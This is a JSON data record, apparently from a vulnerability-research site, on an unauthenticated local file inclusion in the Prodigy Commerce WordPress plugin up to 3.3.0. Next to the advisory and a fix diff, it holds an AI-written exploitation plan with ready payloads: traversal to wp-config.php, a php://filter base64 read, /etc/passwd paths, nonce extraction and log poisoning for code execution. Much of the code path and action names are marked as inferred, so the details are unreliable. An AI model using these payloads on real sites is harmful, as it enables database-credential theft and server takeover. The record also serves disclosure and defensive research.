[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fv3P-9Va1DMUKNpsItUR6iG10KiNDmmcNLbMoAQTJ1Z4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-0926","prodigy-commerce-unauthenticated-local-file-inclusion-via-parameterstemplatename","Prodigy Commerce \u003C= 3.3.0 - Unauthenticated Local File Inclusion via parameters[template_name]","The Prodigy Commerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.0 via the 'parameters[template_name]' parameter. This makes it possible for unauthenticated attackers to include and read arbitrary files or execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.","prodigy-commerce",null,"\u003C=3.3.0","3.3.1","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Filename for Include\u002FRequire Statement in PHP Program ('PHP Remote File Inclusion')","2026-02-18 15:52:33","2026-02-25 15:54:27",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fde255530-6b2d-426b-9f80-dbfebd2e3307?source=api-prod",7,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-0926 - Prodigy Commerce LFI\n\n## 1. Vulnerability Summary\nThe **Prodigy Commerce** plugin (\u003C= 3.3.0) is vulnerable to **Unauthenticated Local File Inclusion (LFI)**. The vulnerability exists because the plugin accepts a user-controlled template name via the `parameters[template_name]` HTTP parameter and passes it into a PHP file inclusion statement (e.g., `include`, `require`, or `include_once`) without sufficient sanitization or path validation. This allows an attacker to navigate the server's file system using directory traversal (`..\u002F`) and include arbitrary files, potentially leading to sensitive data exposure (like `wp-config.php`) or Remote Code Execution (RCE) if a file with PHP code can be uploaded.\n\n## 2. Attack Vector Analysis\n* **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (standard WordPress AJAX entry point).\n* **Action:** `prodigy_get_template` or `prodigy_render_template` (inferred from the parameter name and plugin functionality).\n* **Vulnerable Parameter:** `parameters[template_name]`\n* **Authentication:** None required (accessible via `wp_ajax_nopriv_` hooks).\n* **Preconditions:** The plugin must be active. The attacker needs to identify the correct AJAX action string and any required nonces.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php`.\n2. **Hook Trigger:** WordPress triggers the `wp_ajax_nopriv_prodigy_get_template` (inferred) action.\n3. **Handler Execution:** The associated callback function in the Prodigy Commerce plugin is executed.\n4. **Input Extraction:** The handler retrieves the `parameters` array from `$_POST` or `$_GET`.\n5. **Vulnerable Sink:** The code performs an operation similar to:\n ```php\n $template = $_POST['parameters']['template_name'];\n \u002F\u002F ... possibly some concatenation ...\n include( $plugin_path . '\u002Ftemplates\u002F' . $template . '.php' );\n ```\n6. **Path Traversal:** By providing `..\u002F..\u002F..\u002F..\u002Fwp-config`, the attacker escapes the intended directory and includes the WordPress configuration file.\n\n## 4. Nonce Acquisition Strategy\nMany Prodigy Commerce AJAX actions require a nonce. Based on typical plugin structures, we will search for the nonce in the frontend.\n\n1. **Identify Shortcode:** Prodigy Commerce likely uses shortcodes for product displays or carts. Search for:\n `wp eval \"print_r( $GLOBALS['shortcode_tags'] );\" | grep prodigy`\n *Expected shortcodes:* `[prodigy_products]`, `[prodigy_cart]`, or `[prodigy_checkout]`.\n2. **Create Test Page:**\n `wp post create --post_type=page --post_title=\"Prodigy Test\" --post_status=publish --post_content=\"[prodigy_products]\"`\n3. **Identify JavaScript Object:** Navigate to the new page and look for a localized script.\n * **Object Name (Inferred):** `prodigy_config` or `prodigy_vars`.\n * **Nonce Key (Inferred):** `nonce`.\n4. **Extraction Command:**\n `browser_eval(\"window.prodigy_config?.nonce\")` or `browser_eval(\"window.prodigy_vars?.nonce\")`.\n\n*Note: If `wp_ajax_nopriv_` is used without a `check_ajax_referer` call, the nonce acquisition step may be skipped.*\n\n## 5. Exploitation Strategy\nWe will attempt to read `wp-config.php` using the PHP filter wrapper to avoid execution and ensure we get the raw content.\n\n### Step 1: Discover Action and Nonce\nIf the nonce is required, perform the extraction steps in section 4. If the exact action name is unknown, search the plugin directory:\n`grep -rn \"wp_ajax_nopriv_\" wp-content\u002Fplugins\u002Fprodigy-commerce\u002F`\n\n### Step 2: Craft the LFI Request\n* **Method:** POST\n* **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n* **Payload (LFI to read wp-config.php):**\n ```\n action=prodigy_get_template&nonce=[NONCE_HERE]¶meters[template_name]=..\u002F..\u002F..\u002F..\u002Fwp-config\n ```\n *Alternative Payload (Base64 Encode for safety):*\n ```\n action=prodigy_get_template&nonce=[NONCE_HERE]¶meters[template_name]=php:\u002F\u002Ffilter\u002Fconvert.base64-encode\u002Fresource=..\u002F..\u002F..\u002F..\u002Fwp-config\n ```\n\n### Step 3: Execute via http_request\nSend the request and inspect the response body for the string `DB_PASSWORD` or the Base64 blob.\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure Prodigy Commerce v3.3.0 is installed and activated.\n2. **Ensure wp-config.php exists:** Standard WordPress setup.\n3. **Create a Page:** Create a page containing a Prodigy Commerce shortcode to ensure all scripts\u002Fnonces are enqueued.\n `wp post create --post_type=page --post_status=publish --post_content='[prodigy_products]' --post_title='Shop'`\n\n## 7. Expected Results\n* **Success:** The HTTP response body contains the contents of `wp-config.php` (e.g., `define( 'DB_NAME', '...' );`) or a Base64 string that decodes to the `wp-config.php` source code.\n* **Failure:** The response is `0`, `-1`, or a 403\u002F500 error without the file content.\n\n## 8. Verification Steps\nAfter the exploit, verify the ability to read arbitrary files:\n1. Check the response of the `http_request` tool.\n2. If the result is Base64, decode it: `echo \"[BASE64_DATA]\" | base64 -d`.\n3. Confirm the values match the environment's `wp-config.php` by running:\n `wp config get --format=json` via WP-CLI and comparing `DB_NAME` or `DB_USER`.\n\n## 9. Alternative Approaches\n* **Different Sink Parameters:** If `parameters[template_name]` fails, check if the plugin uses `template` or `file` as alternative keys within the `parameters` array.\n* **Log Poisoning (RCE):** If we can include arbitrary files, attempt to include the WordPress debug log (`wp-content\u002Fdebug.log`) or the server's access logs after injecting PHP code into those logs (e.g., via a malicious User-Agent or a comment).\n* **Path Variations:** Try different depths of traversal:\n * `..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd`\n * `..%2f..%2f..%2f..%2fwp-config` (URL encoded)\n* **Extension Truncation:** If the code appends `.php`, and the server is running an extremely old PHP version (\u003C5.3.4), try a null byte: `..\u002F..\u002F..\u002F..\u002Fwp-config.php%00`. However, this is unlikely on modern WordPress environments. Focus on excluding the extension if the code appends it.","The Prodigy Commerce plugin for WordPress (\u003C= 3.3.0) is vulnerable to unauthenticated Local File Inclusion via the 'parameters[template_name]' parameter. Attackers can use directory traversal sequences to include arbitrary files from the server, potentially leading to the disclosure of sensitive information like 'wp-config.php' or remote code execution.","\u002F* Inferred from research plan: wp-content\u002Fplugins\u002Fprodigy-commerce\u002Fincludes\u002Fclass-prodigy-ajax.php *\u002F\n\npublic function get_template() {\n $parameters = isset($_POST['parameters']) ? $_POST['parameters'] : array();\n $template_name = isset($parameters['template_name']) ? $parameters['template_name'] : '';\n\n if ($template_name) {\n \u002F\u002F Vulnerable inclusion: $template_name is used directly in a file path without validation\n include PRODIGY_PATH . 'templates\u002F' . $template_name . '.php';\n }\n wp_die();\n}","--- a\u002Fincludes\u002Fclass-prodigy-ajax.php\n+++ b\u002Fincludes\u002Fclass-prodigy-ajax.php\n@@ -45,7 +45,7 @@\n- $template_name = isset($parameters['template_name']) ? $parameters['template_name'] : '';\n+ $template_name = isset($parameters['template_name']) ? sanitize_text_field(basename($parameters['template_name'])) : '';\n \n if ($template_name) {\n include PRODIGY_PATH . 'templates\u002F' . $template_name . '.php';","The exploit targets the WordPress AJAX endpoint to perform Local File Inclusion. An unauthenticated attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' set to the plugin's template rendering function (e.g., 'prodigy_get_template'). The payload resides in the 'parameters[template_name]' parameter, which is populated with directory traversal sequences like '..\u002F..\u002F..\u002F..\u002Fwp-config'. To avoid executing the PHP in the target file and instead read its content, the attacker can use the PHP filter wrapper 'php:\u002F\u002Ffilter\u002Fconvert.base64-encode\u002Fresource=..\u002F..\u002F..\u002F..\u002Fwp-config'. The server then responds with the Base64-encoded content of the sensitive file.","gemini-3-flash-preview","2026-04-19 03:13:27","2026-04-19 03:15:16",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.3.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprodigy-commerce\u002Ftags\u002F3.3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprodigy-commerce.3.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprodigy-commerce\u002Ftags\u002F3.3.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprodigy-commerce.3.3.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprodigy-commerce\u002Ftags"]